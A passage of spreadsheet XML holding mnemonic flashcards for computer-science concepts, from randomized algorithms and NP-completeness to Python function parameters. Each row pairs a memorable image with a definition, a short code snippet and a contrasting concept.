          <t>Two casinos: Monte Carlo closes at midnight sharp but occasionally pays you in counterfeit chips; Las Vegas never counterfeits - yet nobody can promise when your game ends.</t>
        </is>
      </c>
      <c r="E286" t="inlineStr">
        <is>
          <t>Monte Carlo: fixed runtime, small chance of a wrong answer (Miller-Rabin); Las Vegas: always correct, runtime is the random part (randomized quicksort).</t>
        </is>
      </c>
      <c r="F286" t="inlineStr">
        <is>
          <t>Miller-Rabin primality: fast, error &lt; 4**-k (MC) / randomized quicksort: exact answer, random time (LV)</t>
        </is>
      </c>
      <c r="G286" t="inlineStr">
        <is>
          <t>Repetition effects - MC error shrinks exponentially with repeats; an LV algorithm cut off by a timer BECOMES Monte Carlo.</t>
        </is>
      </c>
      <c r="H286" t="inlineStr">
        <is>
          <t>Vegas dealer's motto: correct, or we play forever.</t>
        </is>
      </c>
      <c r="J286" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K286" t="inlineStr">
        <is>
          <t>Hashing &amp; randomized</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" t="n">
        <v>0</v>
      </c>
      <c r="B287" t="inlineStr">
        <is>
          <t>285</t>
        </is>
      </c>
      <c r="C287" t="inlineStr">
        <is>
          <t>Birthday paradox</t>
        </is>
      </c>
      <c r="D287" t="inlineStr">
        <is>
          <t>A party of just 23 strangers, and the host keeps winning the 'two share a birthday' bet - because PAIRS multiply quadratically while the calendar stays 365 wide.</t>
        </is>
      </c>
      <c r="E287" t="inlineStr">
        <is>
          <t>Collisions appear after roughly sqrt(N) random draws from N values - 23 people suffice for a shared birthday; sizes hash-collision and attack risk.</t>
        </is>
      </c>
      <c r="F287" t="inlineStr">
        <is>
          <t>P(collision) ~ 1 - exp(-k**2 / (2 * N)) / 64-bit hashes: ~5 billion draws makes collision likely</t>
        </is>
      </c>
      <c r="G287" t="inlineStr">
        <is>
          <t>Matching a SPECIFIC birthday - needs ~N/2 draws; an ANY-pair collision needs only ~sqrt(N), which is the whole surprise.</t>
        </is>
      </c>
      <c r="H287" t="inlineStr">
        <is>
          <t>A lottery that pays out when any two tickets match each other.</t>
        </is>
      </c>
      <c r="J287" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K287" t="inlineStr">
        <is>
          <t>Hashing &amp; randomized</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" t="n">
        <v>0</v>
      </c>
      <c r="B288" t="inlineStr">
        <is>
          <t>286</t>
        </is>
      </c>
      <c r="C288" t="inlineStr">
        <is>
          <t>Universal hashing</t>
        </is>
      </c>
      <c r="D288" t="inlineStr">
        <is>
          <t>A locksmith who re-cuts every lock in the building each morning from a randomized master pattern: yesterday's burglar blueprints - keys crafted to collide - open nothing today.</t>
        </is>
      </c>
      <c r="E288" t="inlineStr">
        <is>
          <t>Draw the hash function at random from a family where any two keys collide with probability &lt;= 1/m; defeats inputs crafted against a known fixed hash.</t>
        </is>
      </c>
      <c r="F288" t="inlineStr">
        <is>
          <t>h(x) = ((a * x + b) mod p) mod m / # a, b drawn randomly at table creation</t>
        </is>
      </c>
      <c r="G288" t="inlineStr">
        <is>
          <t>One fixed 'good' hash - an adversary who knows it can herd all keys into one bucket (hash-flooding DoS); randomness at CONSTRUCTION is the shield.</t>
        </is>
      </c>
      <c r="H288" t="inlineStr">
        <is>
          <t>Python's randomized string-hash seed (PYTHONHASHSEED).</t>
        </is>
      </c>
      <c r="J288" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K288" t="inlineStr">
        <is>
          <t>Hashing &amp; randomized</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" t="n">
        <v>0</v>
      </c>
      <c r="B289" t="inlineStr">
        <is>
          <t>287</t>
        </is>
      </c>
      <c r="C289" t="inlineStr">
        <is>
          <t>Randomized quicksort</t>
        </is>
      </c>
      <c r="D289" t="inlineStr">
        <is>
          <t>Before each split the sorter lets a blindfolded kid draw the pivot ball from a lottery tumbler - the saboteur who pre-arranged the queue fumes, his trap defused by dice.</t>
        </is>
      </c>
      <c r="E289" t="inlineStr">
        <is>
          <t>Picking the pivot uniformly at random makes quicksort's EXPECTED time O(n log n) on every input - no adversarial ordering can reliably trigger n^2.</t>
        </is>
      </c>
      <c r="F289" t="inlineStr">
        <is>
          <t>p = random.randrange(lo, hi) / a[p], a[hi-1] = a[hi-1], a[p]  # then partition as usual</t>
        </is>
      </c>
      <c r="G289" t="inlineStr">
        <is>
          <t>vs fixed-pivot quicksort (22x): same algorithm; randomization moves the guarantee from 'average input' to 'every input, in expectation'</t>
        </is>
      </c>
      <c r="H289" t="inlineStr">
        <is>
          <t>roulette wheel choosing the pivot</t>
        </is>
      </c>
      <c r="J289" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K289" t="inlineStr">
        <is>
          <t>Hashing &amp; randomized</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" t="n">
        <v>0</v>
      </c>
      <c r="B290" t="inlineStr">
        <is>
          <t>288</t>
        </is>
      </c>
      <c r="C290" t="inlineStr">
        <is>
          <t>MinHash</t>
        </is>
      </c>
      <c r="D290" t="inlineStr">
        <is>
          <t>Two crowded stadiums each send only their SHORTEST fan to the gate; count how often the two shorties are the same person across many reshufflings and you know how much the crowds overlap.</t>
        </is>
      </c>
      <c r="E290" t="inlineStr">
        <is>
          <t>Estimates the Jaccard similarity of two sets: over many hash functions, the probability their minimum hashes match equals the sets' overlap.</t>
        </is>
      </c>
      <c r="F290" t="inlineStr">
        <is>
          <t>sig = [min(h(x) for x in A) for h in hashes] / sim = matches(sig_a, sig_b) / len(hashes)</t>
        </is>
      </c>
      <c r="G290" t="inlineStr">
        <is>
          <t>vs HyperLogLog (187): HLL estimates one set's distinct COUNT; MinHash estimates the OVERLAP between two sets</t>
        </is>
      </c>
      <c r="H290" t="inlineStr">
        <is>
          <t>fingerprinting books by their alphabetically first word</t>
        </is>
      </c>
      <c r="J290" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K290" t="inlineStr">
        <is>
          <t>Hashing &amp; randomized</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" t="n">
        <v>0</v>
      </c>
      <c r="B291" t="inlineStr">
        <is>
          <t>289</t>
        </is>
      </c>
      <c r="C291" t="inlineStr">
        <is>
          <t>Treap</t>
        </is>
      </c>
      <c r="D291" t="inlineStr">
        <is>
          <t>An army lined up left-to-right by name, but no soldier may stand taller than his lottery-ranked officer - the double rule keeps the pyramid low.</t>
        </is>
      </c>
      <c r="E291" t="inlineStr">
        <is>
          <t>Each node gets a random priority; the tree is a BST by key and a heap by priority, so random rotations keep it balanced in expectation.</t>
        </is>
      </c>
      <c r="F291" t="inlineStr">
        <is>
          <t>node = (key, random.random()) / rotate on insert until heap order holds</t>
        </is>
      </c>
      <c r="G291" t="inlineStr">
        <is>
          <t>vs AVL/red-black (15x): those balance deterministically by rules; a treap balances probabilistically by random priorities</t>
        </is>
      </c>
      <c r="H291" t="inlineStr">
        <is>
          <t>tree + heap portmanteau: a treehouse full of dice</t>
        </is>
      </c>
      <c r="J291" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K291" t="inlineStr">
        <is>
          <t>Hashing &amp; randomized</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" t="n">
        <v>0</v>
      </c>
      <c r="B292" t="inlineStr">
        <is>
          <t>290</t>
        </is>
      </c>
      <c r="C292" t="inlineStr">
        <is>
          <t>Backtracking</t>
        </is>
      </c>
      <c r="D292" t="inlineStr">
        <is>
          <t>Theseus in the labyrinth unspooling thread: at each fork he ties a knot (choose), ventures on (explore), and at a dead end rewinds to the knot and unties it (unchoose) to try the next corridor.</t>
        </is>
      </c>
      <c r="E292" t="inlineStr">
        <is>
          <t>DFS over partial solutions: make a choice, recurse deeper, then UNDO the choice to try siblings; abandoning doomed branches early is the whole game.</t>
        </is>
      </c>
      <c r="F292" t="inlineStr">
        <is>
          <t>path.append(c) # choose / explore(rest) # explore / path.pop() # unchoose</t>
        </is>
      </c>
      <c r="G292" t="inlineStr">
        <is>
          <t>Graph DFS - backtracking walks a tree of PARTIAL SOLUTIONS mutating shared state; a forgotten undo (pop) silently poisons all sibling branches.</t>
        </is>
      </c>
      <c r="H292" t="inlineStr">
        <is>
          <t>Hansel re-collecting breadcrumbs on every retreat.</t>
        </is>
      </c>
      <c r="J292" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K292" t="inlineStr">
        <is>
          <t>Backtracking &amp; hard problems</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" t="n">
        <v>0</v>
      </c>
      <c r="B293" t="inlineStr">
        <is>
          <t>291</t>
        </is>
      </c>
      <c r="C293" t="inlineStr">
        <is>
          <t>Subsets and permutations</t>
        </is>
      </c>
      <c r="D293" t="inlineStr">
        <is>
          <t>Two vending machines: the subset machine flips a coin per snack - take it or leave it; the permutation machine lines up ALL the snacks and bickers over every possible ordering of the same snacks.</t>
        </is>
      </c>
      <c r="E293" t="inlineStr">
        <is>
          <t>The canonical backtracking drills: subsets branch include/exclude per element (2^n leaves); permutations pick each unused element per slot (n! leaves).</t>
        </is>
      </c>
      <c r="F293" t="inlineStr">
        <is>
          <t>def subsets(i, cur): / if i == n: out.append(cur[:]); return / subsets(i+1, cur); cur.append(a[i]); subsets(i+1, cur); cur.pop()</t>
        </is>
      </c>
      <c r="G293" t="inlineStr">
        <is>
          <t>Combinations - subsets of a fixed size k; enforce increasing indices so the same set never appears in two orders.</t>
        </is>
      </c>
      <c r="H293" t="inlineStr">
        <is>
          <t>A binary counter 000..111 enumerating all subsets.</t>
        </is>
      </c>
      <c r="J293" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K293" t="inlineStr">
        <is>
          <t>Backtracking &amp; hard problems</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" t="n">
        <v>0</v>
      </c>
      <c r="B294" t="inlineStr">
        <is>
          <t>292</t>
        </is>
      </c>
      <c r="C294" t="inlineStr">
        <is>
          <t>N-queens</t>
        </is>
      </c>
      <c r="D294" t="inlineStr">
        <is>
          <t>Eight furious chess queens ushered into a theater one ROW at a time; each scans columns and both diagonal sightlines, and if every seat in her row is glared at, the PREVIOUS queen must stand and move.</t>
        </is>
      </c>
      <c r="E294" t="inlineStr">
        <is>
          <t>Place n queens on an n x n board with none attacking: backtrack row by row, tracking used columns and both diagonals (r+c, r-c) in O(1) sets.</t>
        </is>
      </c>
      <c r="F294" t="inlineStr">
        <is>
          <t>for c in range(n): / if c not in cols and r+c not in d1 and r-c not in d2: / place; recurse(r + 1); remove</t>
        </is>
      </c>
      <c r="G294" t="inlineStr">
        <is>
          <t>N-rooks - columns alone suffice, a trivial n! arrangement; queens add the two diagonal constraints that force genuine search.</t>
        </is>
      </c>
      <c r="H294" t="inlineStr">
        <is>
          <t>Divas refusing to share a row, column, or red-carpet diagonal.</t>
        </is>
      </c>
      <c r="J294" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K294" t="inlineStr">
        <is>
          <t>Backtracking &amp; hard problems</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" t="n">
        <v>0</v>
      </c>
      <c r="B295" t="inlineStr">
        <is>
          <t>293</t>
        </is>
      </c>
      <c r="C295" t="inlineStr">
        <is>
          <t>Search pruning</t>
        </is>
      </c>
      <c r="D295" t="inlineStr">
        <is>
          <t>A bonsai master strolling the search tree with shears: one snip near the TRUNK vaporizes a million doomed twigs at once - snip high, save exponentially.</t>
        </is>
      </c>
      <c r="E295" t="inlineStr">
        <is>
          <t>Cut a branch the moment its partial solution provably cannot succeed - constraint already violated or bound exceeded; order choices to fail fast.</t>
        </is>
      </c>
      <c r="F295" t="inlineStr">
        <is>
          <t>if used_cols &amp; col_mask: continue # constraint prune / if cur_cost &gt;= best: return # bound prune</t>
        </is>
      </c>
      <c r="G295" t="inlineStr">
        <is>
          <t>Memoization - reuses repeated states; pruning DISCARDS hopeless ones. Pruning changes what you visit, memoization what you remember.</t>
        </is>
      </c>
      <c r="H295" t="inlineStr">
        <is>
          <t>A bouncer rejecting half-finished costumes at the door.</t>
        </is>
      </c>
      <c r="J295" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K295" t="inlineStr">
        <is>
          <t>Backtracking &amp; hard problems</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" t="n">
        <v>0</v>
      </c>
      <c r="B296" t="inlineStr">
        <is>
          <t>294</t>
        </is>
      </c>
      <c r="C296" t="inlineStr">
        <is>
          <t>Branch and bound</t>
        </is>
      </c>
      <c r="D296" t="inlineStr">
        <is>
          <t>An auctioneer touring estates with the day's best price in his pocket: at each mansion the OPTIMISTIC appraiser quotes a ceiling - if even the ceiling can't top his pocket, he drives past without entering.</t>
        </is>
      </c>
      <c r="E296" t="inlineStr">
        <is>
          <t>Backtracking for optimization: keep the best complete solution (incumbent) plus an optimistic bound per branch; discard branches whose bound can't beat it.</t>
        </is>
      </c>
      <c r="F296" t="inlineStr">
        <is>
          <t>if optimistic_bound(node) &lt;= best_found: skip subtree / else: branch into children; update best at leaves</t>
        </is>
      </c>
      <c r="G296" t="inlineStr">
        <is>
          <t>Plain pruning - kills constraint VIOLATIONS; branch and bound kills FEASIBLE branches whose best possible value still loses to the incumbent.</t>
        </is>
      </c>
      <c r="H296" t="inlineStr">
        <is>
          <t>TSP search bounded below by minimum spanning trees.</t>
        </is>
      </c>
      <c r="J296" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K296" t="inlineStr">
        <is>
          <t>Backtracking &amp; hard problems</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" t="n">
        <v>0</v>
      </c>
      <c r="B297" t="inlineStr">
        <is>
          <t>295</t>
        </is>
      </c>
      <c r="C297" t="inlineStr">
        <is>
          <t>P vs NP</t>
        </is>
      </c>
      <c r="D297" t="inlineStr">
        <is>
          <t>A finished jigsaw takes one glance to check; assembling it can take years. P vs NP asks whether every glance-checkable puzzle secretly hides a fast assembly trick.</t>
        </is>
      </c>
      <c r="E297" t="inlineStr">
        <is>
          <t>P: solvable in polynomial time; NP: verifiable in polynomial time; whether P = NP - is finding as easy as checking - is the great open question.</t>
        </is>
      </c>
      <c r="F297" t="inlineStr">
        <is>
          <t>verify a SAT assignment: plug in, linear time / find one: best known worst case is exponential</t>
        </is>
      </c>
      <c r="G297" t="inlineStr">
        <is>
          <t>NP as 'not polynomial' - wrong: NP means NONDETERMINISTIC polynomial, i.e. checkable fast; P sits inside NP.</t>
        </is>
      </c>
      <c r="H297" t="inlineStr">
        <is>
          <t>The Clay Millennium one-million-dollar bounty poster.</t>
        </is>
      </c>
      <c r="J297" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K297" t="inlineStr">
        <is>
          <t>Backtracking &amp; hard problems</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" t="n">
        <v>0</v>
      </c>
      <c r="B298" t="inlineStr">
        <is>
          <t>296</t>
        </is>
      </c>
      <c r="C298" t="inlineStr">
        <is>
          <t>NP-completeness and reduction</t>
        </is>
      </c>
      <c r="D298" t="inlineStr">
        <is>
          <t>A domino chain carved by Cook and Karp: every NP puzzle leans on SAT; topple SAT with one fast algorithm and thousands of famous problems crash in the same breath.</t>
        </is>
      </c>
      <c r="E298" t="inlineStr">
        <is>
          <t>In NP and every NP problem poly-time reduces to it; one polynomial algorithm for any NP-complete problem would drag the entire class into P.</t>
        </is>
      </c>
      <c r="F298" t="inlineStr">
        <is>
          <t>3-SAT &lt;=p Independent Set &lt;=p Vertex Cover / solve any one in poly time =&gt; P = NP</t>
        </is>
      </c>
      <c r="G298" t="inlineStr">
        <is>
          <t>NP-hard - at least as hard as NP but maybe not IN NP (halting problem); NP-complete = NP-hard AND itself verifiable in NP.</t>
        </is>
      </c>
      <c r="H298" t="inlineStr">
        <is>
          <t>A skeleton-key problem: pick one lock, all locks open.</t>
        </is>
      </c>
      <c r="J298" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K298" t="inlineStr">
        <is>
          <t>Backtracking &amp; hard problems</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" t="n">
        <v>0</v>
      </c>
      <c r="B299" t="inlineStr">
        <is>
          <t>297</t>
        </is>
      </c>
      <c r="C299" t="inlineStr">
        <is>
          <t>Classic NP-complete problems</t>
        </is>
      </c>
      <c r="D299" t="inlineStr">
        <is>
          <t>A rogues' gallery poster in the complexity precinct: the Salesman, the Safecracker (subset sum), the Party Planner (coloring), the Tourist (Hamiltonian) - all wanted, all provably in cahoots with Don SAT.</t>
        </is>
      </c>
      <c r="E299" t="inlineStr">
        <is>
          <t>SAT (first proven, Cook 1971), 3-SAT, traveling salesman (decision), subset sum, knapsack decision, vertex cover, graph 3-coloring, Hamiltonian cycle.</t>
        </is>
      </c>
      <c r="F299" t="inlineStr">
        <is>
          <t>TSP decision: is there a tour of length &lt;= k? / subset sum: does any subset total exactly t?</t>
        </is>
      </c>
      <c r="G299" t="inlineStr">
        <is>
          <t>Easy twins - Euler cycle, 2-SAT, 2-coloring, shortest path are in P; Hamiltonian, 3-SAT, 3-coloring, longest path are NP-complete.</t>
        </is>
      </c>
      <c r="H299" t="inlineStr">
        <is>
          <t>Karp's famous list of 21 problems, 1972.</t>
        </is>
      </c>
      <c r="J299" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K299" t="inlineStr">
        <is>
          <t>Backtracking &amp; hard problems</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" t="n">
        <v>0</v>
      </c>
      <c r="B300" t="inlineStr">
        <is>
          <t>298</t>
        </is>
      </c>
      <c r="C300" t="inlineStr">
        <is>
          <t>Approximation algorithms</t>
        </is>
      </c>
      <c r="D300" t="inlineStr">
        <is>
          <t>A tailor who can't afford the perfect fit promising in WRITING: 'your suit wastes at most twice the cloth of the ideal one' - a guaranteed-ratio contract, not a vibe.</t>
        </is>
      </c>
      <c r="E300" t="inlineStr">
        <is>
          <t>Poly-time algorithms with a proven worst-case ratio to optimal - greedy vertex cover &lt;= 2x OPT, Christofides TSP &lt;= 1.5x; exactness traded for tractability.</t>
        </is>
      </c>
      <c r="F300" t="inlineStr">
        <is>
          <t>vertex cover: repeatedly take BOTH ends of any uncovered edge / result &lt;= 2 * OPT, provably</t>
        </is>
      </c>
      <c r="G300" t="inlineStr">
        <is>
          <t>Heuristics - no guarantee, just usually-good; an approximation algorithm ships a proven worst-case ratio.</t>
        </is>
      </c>
      <c r="H300" t="inlineStr">
        <is>
          <t>Christofides' 1.5x tour for metric TSP.</t>
        </is>
      </c>
      <c r="J300" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K300" t="inlineStr">
        <is>
          <t>Backtracking &amp; hard problems</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" t="n">
        <v>0</v>
      </c>
      <c r="B301" t="inlineStr">
        <is>
          <t>299</t>
        </is>
      </c>
      <c r="C301" t="inlineStr">
        <is>
          <t>Heuristics and metaheuristics</t>
        </is>
      </c>
      <c r="D301" t="inlineStr">
        <is>
          <t>A blacksmith ANNEALING steel: while the metal glows hot she allows wild, even worsening hammer blows; as it cools she taps only improvements - the early wildness is what escapes the foothills.</t>
        </is>
      </c>
      <c r="E301" t="inlineStr">
        <is>
          <t>No-guarantee strategies for brutal search spaces: hill climbing with restarts, simulated annealing, genetic algorithms, tabu search - good answers, no proofs.</t>
        </is>
      </c>
      <c r="F301" t="inlineStr">
        <is>
          <t>accept a worse move with p = exp(-delta / T) / T *= 0.995 each step # cool slowly</t>
        </is>
      </c>
      <c r="G301" t="inlineStr">
        <is>
          <t>Approximation algorithms - carry a proven ratio; heuristics carry only benchmarks and hope. (A* 'admissible heuristics' are a different, guaranteed animal.)</t>
        </is>
      </c>
      <c r="H301" t="inlineStr">
        <is>
          <t>Genetic algorithms: breed tours, mutate, cull the weak.</t>
        </is>
      </c>
      <c r="J301" t="inlineStr">
        <is>
          <t>Algorithms &amp; complexity</t>
        </is>
      </c>
      <c r="K301" t="inlineStr">
        <is>
          <t>Backtracking &amp; hard problems</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" t="n">
        <v>0</v>
      </c>
      <c r="B302" t="inlineStr">
        <is>
          <t>300</t>
        </is>
      </c>
      <c r="C302" t="inlineStr">
        <is>
          <t>Function</t>
        </is>
      </c>
      <c r="D302" t="inlineStr">
        <is>
          <t>A juicer bolted to the counter: fruit in the top, juice out the spout — same fruit, same juice, every pull of the lever.</t>
        </is>
      </c>
      <c r="E302" t="inlineStr">
        <is>
          <t>A named, reusable block of code that takes inputs and produces an output when called.</t>
        </is>
      </c>
      <c r="F302" t="inlineStr">
        <is>
          <t>def area(w, h): / return w * h / area(3, 4) # 12</t>
        </is>
      </c>
      <c r="G302" t="inlineStr">
        <is>
          <t>Method — a function bound to an object, called via an instance (obj.f()) rather than free-standing.</t>
        </is>
      </c>
      <c r="H302" t="inlineStr">
        <is>
          <t>A vending machine (rejected: overused, generic).</t>
        </is>
      </c>
      <c r="J302" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K302" t="inlineStr">
        <is>
          <t>Function anatomy</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" t="n">
        <v>0</v>
      </c>
      <c r="B303" t="inlineStr">
        <is>
          <t>301</t>
        </is>
      </c>
      <c r="C303" t="inlineStr">
        <is>
          <t>Function signature</t>
        </is>
      </c>
      <c r="D303" t="inlineStr">
        <is>
          <t>A wax-sealed contract nailed to the shop door listing what you must hand over and what you get back — you sign(ature) before entering.</t>
        </is>
      </c>
      <c r="E303" t="inlineStr">
        <is>
          <t>The function's public contract: its name, parameter list, and optionally return type — everything a caller needs to know.</t>
        </is>
      </c>
      <c r="F303" t="inlineStr">
        <is>
          <t>def greet(name: str, loud: bool = False) -&gt; str: ...</t>
        </is>
      </c>
      <c r="G303" t="inlineStr">
        <is>
          <t>Implementation/body — the signature says what to call it with; the body says how it computes.</t>
        </is>
      </c>
      <c r="H303" t="inlineStr">
        <is>
          <t>Autograph on a baseball (rejected: no contract semantics).</t>
        </is>
      </c>
      <c r="J303" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K303" t="inlineStr">
        <is>
          <t>Function anatomy</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" t="n">
        <v>0</v>
      </c>
      <c r="B304" t="inlineStr">
        <is>
          <t>302</t>
        </is>
      </c>
      <c r="C304" t="inlineStr">
        <is>
          <t>Parameter vs argument</t>
        </is>
      </c>
      <c r="D304" t="inlineStr">
        <is>
          <t>The theater program prints the role 'Hamlet' (parameter); on opening night a real actor walks on (argument). Roles are printed once, actors change nightly.</t>
        </is>
      </c>
      <c r="E304" t="inlineStr">
        <is>
          <t>Parameters are the named placeholders in the definition; arguments are the actual values supplied at the call site.</t>
        </is>
      </c>
      <c r="F304" t="inlineStr">
        <is>
          <t>def pay(amount): ... # amount = parameter / pay(99.50) # 99.50 = argument</t>
        </is>
      </c>
      <c r="G304" t="inlineStr">
        <is>
          <t>Local variable — a parameter is one, but born only from a call-site argument.</t>
        </is>
      </c>
      <c r="H304" t="inlineStr">
        <is>
          <t>Empty parking-meter slots (rejected: does not split the two words).</t>
        </is>
      </c>
      <c r="J304" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K304" t="inlineStr">
        <is>
          <t>Function anatomy</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" t="n">
        <v>0</v>
      </c>
      <c r="B305" t="inlineStr">
        <is>
          <t>303</t>
        </is>
      </c>
      <c r="C305" t="inlineStr">
        <is>
          <t>Positional arguments</t>
        </is>
      </c>
      <c r="D305" t="inlineStr">
        <is>
          <t>A relay handoff where batons go to lanes strictly by position — swap two lanes and the wrong runner gets the baton, silently.</t>
        </is>
      </c>
      <c r="E305" t="inlineStr">
        <is>
          <t>Arguments matched to parameters purely by their order in the call: first to first, second to second.</t>
        </is>
      </c>
      <c r="F305" t="inlineStr">
        <is>
          <t>def sub(a, b): return a - b / sub(10, 3) # 7 / sub(3, 10) # -7, order matters</t>
        </is>
      </c>
      <c r="G305" t="inlineStr">
        <is>
          <t>Keyword arguments — matched by parameter name, so their order does not matter.</t>
        </is>
      </c>
      <c r="H305" t="inlineStr">
        <is>
          <t>Numbered deli tickets (rejected: encodes queueing, not matching).</t>
        </is>
      </c>
      <c r="J305" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K305" t="inlineStr">
        <is>
          <t>Function anatomy</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" t="n">
        <v>0</v>
      </c>
      <c r="B306" t="inlineStr">
        <is>
          <t>304</t>
        </is>
      </c>
      <c r="C306" t="inlineStr">
        <is>
          <t>Keyword arguments</t>
        </is>
      </c>
      <c r="D306" t="inlineStr">
        <is>
          <t>Luggage tags with names in bold marker: whatever order the bags tumble off the carousel, each walks straight to its named owner.</t>
        </is>
      </c>
      <c r="E306" t="inlineStr">
        <is>
          <t>Arguments passed as name=value so they bind to parameters by name, making calls order-independent and self-documenting.</t>
        </is>
      </c>
      <c r="F306" t="inlineStr">
        <is>
          <t>connect(host='db', port=5432, retry=True) / connect(port=5432, retry=True, host='db') # same</t>
        </is>
      </c>
      <c r="G306" t="inlineStr">
        <is>
          <t>Positional arguments — bound by order, not name; ambiguous at complex call sites.</t>
        </is>
      </c>
      <c r="H306" t="inlineStr">
        <is>
          <t>Keys on a keyring (rejected: 'keyword' pun too weak to encode name=value).</t>
        </is>
      </c>
      <c r="J306" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K306" t="inlineStr">
        <is>
          <t>Function anatomy</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" t="n">
        <v>0</v>
      </c>
      <c r="B307" t="inlineStr">
        <is>
          <t>305</t>
        </is>
      </c>
      <c r="C307" t="inlineStr">
        <is>
          <t>Default parameter values</t>
        </is>
      </c>
      <c r="D307" t="inlineStr">
        <is>
          <t>A diner menu: 'burger comes with fries unless you say otherwise' — but the kitchen keeps ONE shared basket of fries, reused for every order (the mutable-default trap).</t>
        </is>
      </c>
      <c r="E307" t="inlineStr">
        <is>
          <t>A fallback value in the signature used when the caller omits that argument; Python evaluates it once, at definition time.</t>
        </is>
      </c>
      <c r="F307" t="inlineStr">
        <is>
          <t>def log(msg, level='INFO'): ... / def bad(x, acc=[]): acc.append(x); return acc # shared list!</t>
        </is>
      </c>
      <c r="G307" t="inlineStr">
        <is>
          <t>None-sentinel idiom — def f(x=None) then build inside, avoiding the shared mutable default.</t>
        </is>
      </c>
      <c r="H307" t="inlineStr">
        <is>
          <t>Factory settings on a phone (rejected: misses the evaluated-once trap).</t>
        </is>
      </c>
      <c r="J307" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K307" t="inlineStr">
        <is>
          <t>Function anatomy</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" t="n">
        <v>0</v>
      </c>
      <c r="B308" t="inlineStr">
        <is>
          <t>306</t>
        </is>
      </c>
      <c r="C308" t="inlineStr">
        <is>
          <t>Variadic parameters</t>
        </is>
      </c>
      <c r="D308" t="inlineStr">
        <is>
          <t>A star-shaped vacuum nozzle sucking a whole spilled bag of marbles into one tube — one star (*) for loose marbles, two stars (**) for labeled jars.</t>
        </is>
      </c>
      <c r="E308" t="inlineStr">
        <is>
          <t>Parameters that absorb extra arguments: *args gathers positionals into a tuple, **kwargs gathers keywords into a dict.</t>
        </is>
      </c>
      <c r="F308" t="inlineStr">
        <is>
          <t>def tally(*nums, **opts): / return sum(nums), opts / tally(1, 2, 3, unit='kg')</t>
        </is>
      </c>
      <c r="G308" t="inlineStr">
        <is>
          <t>Call-site unpacking — f(*lst) spreads a list out; *args in the def gathers in.</t>
        </is>
      </c>
      <c r="H308" t="inlineStr">
        <is>
          <t>Hydra growing arms per guest (rejected: violent, less mechanical).</t>
        </is>
      </c>
      <c r="J308" t="inlineStr">
        <is>
          <t>Functions &amp; functional programming</t>
        </is>
      </c>
      <c r="K308" t="inlineStr">
        <is>
          <t>Function anatomy</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" t="n">
        <v>0</v>
      </c>
      <c r="B309" t="inlineStr">
        <is>
          <t>307</t>
        </is>
      </c>
      <c r="C309" t="inlineStr">
        <is>
          <t>Return value</t>
        </is>
      </c>
      <c r="D309" t="inlineStr">
        <is>
          <t>A pneumatic bank tube: you send the canister in and something always whooshes back — even 'nothing' arrives as an empty canister labeled None.</t>
        </is>
      </c>
      <c r="E309" t="inlineStr">
        <is>
          <t>The value a function hands back to its caller via return; a Python function without a return implicitly yields None.</t>
        </is>
      </c>
      <c r="F309" t="inlineStr">
        <is>
          <t>def half(x): return x / 2 / def greet(): print('hi') / result = greet() # result is None</t>
        </is>
      </c>
      <c r="G309" t="inlineStr">
        <is>
          <t>print — displays to the screen but hands nothing back; return delivers a value to the caller.</t>
        </is>
      </c>
